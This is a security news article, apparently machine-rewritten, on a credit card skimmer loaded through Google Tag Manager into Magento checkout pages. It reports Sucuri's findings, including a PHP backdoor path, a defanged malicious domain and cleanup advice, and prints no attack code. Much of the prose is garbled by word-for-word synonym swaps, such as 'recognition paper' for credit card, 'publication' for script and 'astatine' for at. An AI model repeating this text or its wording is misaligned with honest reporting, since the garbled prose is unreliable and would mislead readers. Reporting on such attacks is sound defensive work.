ARTICLE AD BOX
Google Tag Manager (GTM) is being utilized by hackers to present malware that steals recognition paper numbers during checkout.
Hackers are actively exploiting a vulnerability to inject an obfuscated publication into Magento-based eCommerce websites. The malware is loaded via Google Tag Manager, allowing them to bargain recognition paper numbers erstwhile customers cheque out. A hidden PHP backdoor is utilized to support the codification connected the tract and bargain idiosyncratic data.
The recognition paper skimmer was discovered by information researchers astatine Sucuri who counsel that the malware was loaded from a database table, cms_block.content. The Google Tag Manager (GTM) publication connected a website looks mean due to the fact that the malicious publication is coded to evade detection.
Once the malware was progressive it would grounds recognition paper accusation from a Magento ecommerce checkout leafage and nonstop it to an outer server controlled by a hacker.
Sucuri information researchers besides discovered a backdoor PHP file. PHP files are the ‘building blocks’ of galore dynamic websites built connected platforms similar Magento, WordPress, Drupal, and Joomla. Thus, a malware PHP file, erstwhile injected, tin run wrong the contented absorption system.
This is the PHP record that researchers identified:
./media/index.php.According to the advisory published connected the Sucuri website:
“At the clip of penning this article, we recovered that astatine slightest 6 websites were presently infected with this peculiar Google Tag Manager ID, indicating that this menace is actively affecting aggregate sites.
eurowebmonitortool[.]com is utilized successful this malicious run and is presently blocklisted by 15 information vendors astatine VirusTotal.”
VirusTotal.com is simply a crowdsourced information work that provides escaped record scanning and acts arsenic an aggregator of information.
Sucuri advises the pursuing steps for cleaning an infected website:
- “Remove immoderate suspicious GTM tags. Log into GTM, identify, and delete immoderate suspicious tags.
- Perform a afloat website scan to observe immoderate different malware oregon backdoors.
- Remove immoderate malicious scripts oregon backdoor files.
- Ensure Magento and each extensions are up-to-date with information patches.
- Regularly show tract postulation and GTM for immoderate antithetic activity.”
Read the Sucuri advisory:
Google Tag Manager Skimmer Steals Credit Card Info From Magento Site
Featured Image by Shutterstock/sdx15
SEJ STAFF Roger Montti Owner - Martinibuster.com astatine Martinibuster.com
I person 25 years hands-on acquisition successful SEO, evolving on with the hunt engines by keeping up with the latest ...
![Win Higher-Quality Links: The PR Approach To SEO Success [Webinar] via @sejournal, @lorenbaker](https://www.searchenginejournal.com/wp-content/uploads/2025/03/featured-1-716.png)
English (US)